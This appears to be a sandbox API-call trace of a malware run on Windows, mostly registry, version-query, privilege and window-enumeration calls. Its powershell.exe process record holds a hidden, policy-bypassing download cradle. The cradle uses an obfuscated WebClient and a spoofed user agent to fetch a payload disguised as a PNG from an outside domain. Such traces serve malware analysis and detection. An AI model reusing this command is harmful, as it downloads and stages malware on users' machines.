	[0212.716] RegCloseKey (hKey=0x160) returned 0x0
	[0212.716] RegCloseKey (hKey=0x368) returned 0x0
	[0212.717] RegCloseKey (hKey=0x364) returned 0x0
	[0252.971] RegCloseKey (hKey=0x33c) returned 0x0
	[0252.972] RegCloseKey (hKey=0x338) returned 0x0
	[0252.972] RegCloseKey (hKey=0x334) returned 0x0
	[0252.972] RegCloseKey (hKey=0x324) returned 0x0
	[0252.972] RegCloseKey (hKey=0x310) returned 0x0
	[0252.973] RegCloseKey (hKey=0x36c) returned 0x0
	[0252.973] RegCloseKey (hKey=0x340) returned 0x0
	[0252.973] RegCloseKey (hKey=0x370) returned 0x0
	[0252.973] RegCloseKey (hKey=0x164) returned 0x0
	[0252.974] RegCloseKey (hKey=0x160) returned 0x0
	[0252.974] RegCloseKey (hKey=0x368) returned 0x0
	[0252.974] RegCloseKey (hKey=0x364) returned 0x0

Process:
	id = "42"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2da3a000"
	os_pid = "0xc64"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "38"
	os_parent_pid = "0xb44"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 320
	os_tid = 0xc68

	[0123.750] strcmp (_Str1="EEHeapAllocInProcessHeap", _Str2="CLRLoadLibraryEx") returned 1
	[0124.574] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0125.239] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0125.239] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0125.239] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0125.239] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0126.486] GetVersionExW (in: lpVersionInformation=0x27daa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x27daa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.696] GetVersionExW (in: lpVersionInformation=0x27daa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x27daa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0126.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0126.709] GetVersionExW (in: lpVersionInformation=0x27d810*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x27d810*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.709] SetErrorMode (uMode=0x1) returned 0x1
	[0126.710] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x27d970 | out: lpFileInformation=0x27d970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0126.711] SetErrorMode (uMode=0x1) returned 0x1
	[0126.714] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x27dbe0 | out: lpdwHandle=0x27dbe0) returned 0x94c
	[0126.715] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d27370 | out: lpData=0x2d27370) returned 1
	[0126.717] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x27db58, puLen=0x27db50 | out: lplpBuffer=0x27db58*=0x2d2740c, puLen=0x27db50) returned 1
	[0126.720] lstrlenW (lpString="䅁") returned 1
	[0126.728] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x2d274e8, puLen=0x27dac0) returned 1
	[0126.729] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0126.731] CoTaskMemAlloc (cb=0x2e) returned 0x1975b0
	[0126.731] lstrcpyW (in: lpString1=0x1975b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0126.732] CoTaskMemFree (pv=0x1975b0) 
	[0126.732] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x2d2753c, puLen=0x27dac0) returned 1
	[0126.732] lstrlenW (lpString="System.Management.Automation") returned 28
	[0126.732] CoTaskMemAlloc (cb=0x3c) returned 0x1336d0
	[0126.732] lstrcpyW (in: lpString1=0x1336d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0126.732] CoTaskMemFree (pv=0x1336d0) 
	[0126.732] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x2d27598, puLen=0x27dac0) returned 1
	[0126.732] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0126.732] CoTaskMemAlloc (cb=0x20) returned 0x19d8a0
	[0126.732] lstrcpyW (in: lpString1=0x19d8a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0126.732] CoTaskMemFree (pv=0x19d8a0) 
	[0126.732] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x2d275d8, puLen=0x27dac0) returned 1
	[0126.732] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0126.732] CoTaskMemAlloc (cb=0x44) returned 0x1336d0
	[0126.732] lstrcpyW (in: lpString1=0x1336d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0126.732] CoTaskMemFree (pv=0x1336d0) 
	[0126.732] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x2d27640, puLen=0x27dac0) returned 1
	[0126.732] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0126.732] CoTaskMemAlloc (cb=0x76) returned 0x124fe0
	[0126.732] lstrcpyW (in: lpString1=0x124fe0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0126.732] CoTaskMemFree (pv=0x124fe0) 
	[0126.732] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x2d276dc, puLen=0x27dac0) returned 1
	[0126.732] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0126.732] CoTaskMemAlloc (cb=0x44) returned 0x1336d0
	[0126.732] lstrcpyW (in: lpString1=0x1336d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0126.733] CoTaskMemFree (pv=0x1336d0) 
	[0126.733] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x2d27740, puLen=0x27dac0) returned 1
	[0126.733] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0126.733] CoTaskMemAlloc (cb=0x58) returned 0x184d70
	[0126.733] lstrcpyW (in: lpString1=0x184d70, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0126.733] CoTaskMemFree (pv=0x184d70) 
	[0126.733] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x2d277bc, puLen=0x27dac0) returned 1
	[0126.733] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0126.733] CoTaskMemAlloc (cb=0x20) returned 0x19d8a0
	[0126.733] lstrcpyW (in: lpString1=0x19d8a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0126.733] CoTaskMemFree (pv=0x19d8a0) 
	[0126.733] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x2d27464, puLen=0x27dac0) returned 1
	[0126.733] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0126.733] CoTaskMemAlloc (cb=0x66) returned 0x19b6d0
	[0126.733] lstrcpyW (in: lpString1=0x19b6d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0126.733] CoTaskMemFree (pv=0x19b6d0) 
	[0126.733] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x0, puLen=0x27dac0) returned 0
	[0126.733] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x0, puLen=0x27dac0) returned 0
	[0126.733] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x27dac8, puLen=0x27dac0 | out: lplpBuffer=0x27dac8*=0x0, puLen=0x27dac0) returned 0
	[0126.733] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x27da98, puLen=0x27da90 | out: lplpBuffer=0x27da98*=0x2d2740c, puLen=0x27da90) returned 1
	[0126.734] CoTaskMemAlloc (cb=0x204) returned 0xe5a90
	[0126.734] VerLanguageNameW (in: wLang=0x0, szLang=0xe5a90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0126.735] CoTaskMemFree (pv=0xe5a90) 
	[0126.735] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\", lplpBuffer=0x27dae8, puLen=0x27dae0 | out: lplpBuffer=0x27dae8*=0x2d27398, puLen=0x27dae0) returned 1
	[0126.882] GetCurrentProcessId () returned 0xc64
	[0126.896] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x27ca10 | out: lpLuid=0x27ca10*(LowPart=0x14, HighPart=0)) returned 1
	[0126.898] GetCurrentProcess () returned 0xffffffffffffffff
	[0126.899] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x27ca30 | out: TokenHandle=0x27ca30*=0x2ec) returned 1
	[0126.900] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2d2abe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0126.901] CloseHandle (hObject=0x2ec) returned 1
	[0126.905] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc64) returned 0x2ec
	[0126.913] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2d2ac50, cb=0x200, lpcbNeeded=0x27da48 | out: lphModule=0x2d2ac50, lpcbNeeded=0x27da48) returned 1
	[0126.915] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13ff20000, lpmodinfo=0x2d2aec0, cb=0x18 | out: lpmodinfo=0x2d2aec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0126.916] CoTaskMemAlloc (cb=0x804) returned 0x19fe50
	[0126.917] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13ff20000, lpBaseName=0x19fe50, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0126.917] CoTaskMemFree (pv=0x19fe50) 
	[0126.917] CoTaskMemAlloc (cb=0x804) returned 0x19fe50
	[0126.917] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13ff20000, lpFilename=0x19fe50, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0126.918] CoTaskMemFree (pv=0x19fe50) 
	[0126.918] CloseHandle (hObject=0x2ec) returned 1
	[0127.052] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc64) returned 0x2ec
	[0127.053] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x27db78 | out: lpExitCode=0x27db78*=0x103) returned 1
	[0127.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d2b088, Length=0x20000, ResultLength=0x27db40 | out: SystemInformation=0x12d2b088, ResultLength=0x27db40*=0x13688) returned 0x0
	[0127.076] EnumWindows (lpEnumFunc=0x29866ac, lParam=0x0) returned 1
	[0127.077] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.077] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.077] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.077] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x334
	[0127.077] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x324
	[0127.077] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x45c
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.078] GetWindowThreadProcessId (in: hWnd=0x202a8, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xa38
	[0127.079] GetWindowThreadProcessId (in: hWnd=0x30290, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xc70
	[0127.079] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x7dc
	[0127.079] GetWindowThreadProcessId (in: hWnd=0xb0184, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xc08
	[0127.079] GetWindowThreadProcessId (in: hWnd=0x40240, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x728
	[0127.079] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x914
	[0127.079] GetWindowThreadProcessId (in: hWnd=0xa022e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x9ec
	[0127.079] GetWindowThreadProcessId (in: hWnd=0x1401b2, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x610
	[0127.079] GetWindowThreadProcessId (in: hWnd=0x60192, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xb5c
	[0127.079] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xbdc
	[0127.079] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x8f0
	[0127.079] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xb8c
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x5e0
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x90
	[0127.080] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x840
	[0127.080] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x844
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x46c
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xb40
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x914
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x988
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x914
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x950
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x914
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x914
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x868
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x850
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x830
	[0127.081] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x814
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x744
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x2a8
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x534
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x5e4
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x5c4
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x58c
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x238
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x584
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x7e8
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x678
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x35c
	[0127.082] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x51c
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x360
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x274
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x588
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xc8
	[0127.083] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x21c
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x5ec
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x334
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x664
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x334
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x664
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x334
	[0127.083] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x5ec
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x5ec
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x550
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x7a0
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x594
